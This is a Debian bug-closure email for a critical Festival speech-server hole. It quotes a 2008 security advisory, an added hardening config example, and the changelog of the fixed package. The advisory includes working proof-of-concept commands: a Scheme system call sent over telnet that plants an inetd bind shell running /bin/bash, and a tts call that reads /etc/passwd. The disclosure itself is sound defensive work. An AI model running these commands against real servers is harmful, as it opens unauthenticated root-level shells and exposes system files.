Your message dated Tue, 19 Feb 2008 08:47:08 +0000
with message-id <[EMAIL PROTECTED]>
and subject line Bug#466146: fixed in festival 1.96~beta-6
has caused the Debian Bug report #466146,
regarding festival: Default configuration allows unauthenticated remote code execution
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)
--
466146: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=466146
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
--- Begin Message ---
Package: festival
Version: 1.96~beta-5
Severity: critical
Tags: security
Justification: root security hole
Nth Dimension Security Advisory (NDSA20080215)
Date: 15th February 2008
Author: Tim Brown <mailto:[EMAIL PROTECTED]>
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>
Product: Festival 1.96:beta July 2004
<http://www.cstr.ed.ac.uk/projects/festival.html>
Vendor: Centre for Speech Technology Research, University of Edinburgh
<http://www.cstr.ed.ac.uk/>
Risk: Medium
Summary
The Festival server is vulnerable to unauthenticated remote code execution.
Further research indicates that this vulnerability has already been reported
as a local privilege escalation against both the Gentoo and SuSE GNU/Linux
distributions. The remote form of this vulnerability was identified in
1.96~beta-5 as distributed in Debian unstable.
Technical Details
The Festival server, which can be started using festival --server, is vulnerable
to unauthenticated remote command execution due to the inclusion of a Scheme
interpreter. It is possible to make use of standard Scheme functions in order
to execute further code, like so:
$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(system "echo '4444 stream tcp nowait festival /bin/bash /bin/bash -i' >
/tmp/backdoor.conf; /usr/sbin/inetd /tmp/backdoor.conf")
Connection closed by foreign host.
Whilst this is the most trivial way that the vulnerability can be exploited,
the inclusion of a Scheme interpreter available without authentication allows
for other vectors of attack. Scheme functions such as SayText and tts (which
reads a file on the vulnerable system) are of particular interest, for example:
$ telnet 10.0.0.1 1314
Trying 10.0.0.1...
Connected to 10.0.0.1.
(tts "/etc/passwd" nil)
Whilst it is acknowledged that the inclusion of the Scheme interpreter in this
manner is entirely intentional, the default insecure state of the server could
be exploited, particularly where the user is unaware of the server's existence.
Solutions
In order to completely protect against the vulnerability (in the short term),
Nth Dimension recommend turning off the server or filtering connections to the
affected port using a host based firewall. The server itself can be secured by
applying the patches located at http://bugs.gentoo.org/show_bug.cgi?id=170477.
This includes applying a default configuration which limits access to localhost
and setting an optional password which prevents unauthenticated access.
-- System Information:
Debian Release: lenny/sid
APT prefers oldstable
APT policy: (500, 'oldstable'), (500, 'unstable'), (500, 'testing'), (500, 'stable'), (1, 'experimental')
Architecture: i386 (i686)
Kernel: Linux 2.6.22-3-686 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages festival depends on:
ii adduser 3.105 add and remove users and groups
ii libaudiofile0 0.2.6-7 Open-source version of SGI's audio
ii libc6 2.7-8 GNU C Library: Shared libraries
ii libesd0 0.2.36-3 Enlightened Sound Daemon - Shared
ii libestools1.2 1:1.2.96~beta-2 Edinburgh Speech Tools Library
ii libgcc1 1:4.3-20080202-1 GCC support library
ii libncurses5 5.6+20080203-1 Shared libraries for terminal hand
ii libstdc++6 4.3-20080202-1 The GNU Standard C++ Library v3
ii lsb-base 3.1-24 Linux Standard Base 3.1 init scrip
ii sgml-base 1.26 SGML infrastructure and SGML catal
ii sysv-rc 2.86.ds1-53 System-V-like runlevel change mech
Versions of packages festival recommends:
ii festvox-kallpc16k [festival-v 1.4.0-5 American English male speaker for
-- no debconf information
--- End Message ---
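The short-term and long-term fixes the advisory describes (restrict the server to localhost, require a password) map onto the server variables documented in the Festival manual's server section. The following is an added example of an /etc/festival.scm fragment showing the weak state beside the hardened one; it is not the Debian package's own festival.scm and not Tim Brown's or the Festival project's code. The variable names server_port, server_access_list, server_deny_list, server_passwd and server_log_file are taken from the Festival manual; the concrete hostnames, the log path and the placeholder password are assumptions, and the exact defaults shipped in 1.96~beta-6 are not stated on this page.

```scheme
;; /etc/festival.scm -- added example, not the Debian package's own file.
;; Sourced by the server on start-up (the Debian fix makes the init script
;; read this file). Variable names follow the Festival manual; the values
;; below are assumptions chosen to illustrate the hardening.

;; --- Weak state (what the advisory describes) --------------------------
;; With no access list and no password, anyone who can reach TCP/1314 gets
;; an unauthenticated Scheme REPL and can call (system "...") as the user
;; the server runs as. Shown commented out; do not run it like this.
;;
;; (set! server_access_list nil)   ; nil = accept every host
;; (set! server_passwd nil)        ; nil = no password required

;; --- Hardened state ----------------------------------------------------
(set! server_port 1314)

;; Accept only connections whose resolved client hostname matches one of
;; these regular expressions. Keep the list to the local machine unless a
;; remote client is genuinely required; entries are regexes on hostnames,
;; not IP ranges, and rely on reverse DNS for the name. The advisory's
;; host-based firewall rule on port 1314 therefore remains the stronger
;; control and should be kept alongside this.
(set! server_access_list '("localhost" "localhost\\.localdomain" "127\\.0\\.0\\.1"))
(set! server_deny_list nil)

;; Require a password before any command is accepted. Because the secret
;; lives in this file, the Debian fix installs /etc/festival.scm as 0600
;; so it is not world-readable; replace the placeholder with a long random
;; value generated at install time.
(set! server_passwd "CHANGE-ME-long-random-value")

;; Log connections so an unexpected client can be spotted (path assumed).
(set! server_log_file "/var/log/festival/server.log")
```

After editing the file, restart the server and verify the change from another host: a telnet to port 1314 should now be refused by the access list, and from localhost the first line sent must be the password before any Scheme expression is evaluated.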
--- Begin Message ---
Source: festival
Source-Version: 1.96~beta-6
We believe that the bug you reported is fixed in the latest version of
festival, which is due to be installed in the Debian FTP archive:
festival-dev_1.96~beta-6_i386.deb
to pool/main/f/festival/festival-dev_1.96~beta-6_i386.deb
festival_1.96~beta-6.diff.gz
to pool/main/f/festival/festival_1.96~beta-6.diff.gz
festival_1.96~beta-6.dsc
to pool/main/f/festival/festival_1.96~beta-6.dsc
festival_1.96~beta-6_i386.deb
to pool/main/f/festival/festival_1.96~beta-6_i386.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Kumar Appaiah <[EMAIL PROTECTED]> (supplier of updated festival package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Sun, 17 Feb 2008 06:45:30 +0530
Source: festival
Binary: festival festival-dev
Architecture: source i386
Version: 1.96~beta-6
Distribution: unstable
Urgency: high
Maintainer: Kartik Mistry <[EMAIL PROTECTED]>
Changed-By: Kumar Appaiah <[EMAIL PROTECTED]>
Description:
festival - General multi-lingual speech synthesis system
festival-dev - Development kit for the Festival speech synthesis system
Closes: 466146
Changes:
festival (1.96~beta-6) unstable; urgency=high
.
* Fix root security hole. Thanks to Tim Brown.
+ debian/festival.init: Read festival.scm upon start.
(Closes: #466146)
* debian/control:
+ Remove Debian revision from speech-tools dependency.
* debian/festival.scm:
+ Add sane default values for server. The festival
init script now uses these values while starting the
server.
* debian/README.Debian:
+ Document some changes on daemon mode.
* debian/templates, debian/config, debian/festival.postinst:
+ Ask for server password during install.
* debian/lintian-override:
+ Permission of /etc/festival.scm should be 0600.
Files:
87ae351a367fd584bd752f64e52e05f4 992 sound optional festival_1.96~beta-6.dsc
03128dd3c341e56350b7ad9427cfce84 70317 sound optional festival_1.96~beta-6.diff.gz
b4c9a5379d229eb83a8950c3bcefe495 914856 sound optional festival_1.96~beta-6_i386.deb
c407b06464a5aa0a53bdec9a7729a148 695604 libdevel optional festival-dev_1.96~beta-6_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)
iD8DBQFHuomP2kYOR+5txmoRAindAJ9sV6p8AaYW55wr2d9KNVtmx5LkvgCeLVeD
H2mr8oAxdTSkUraRlAbNdMQ=
=SMYE
-----END PGP SIGNATURE-----
--- End Message ---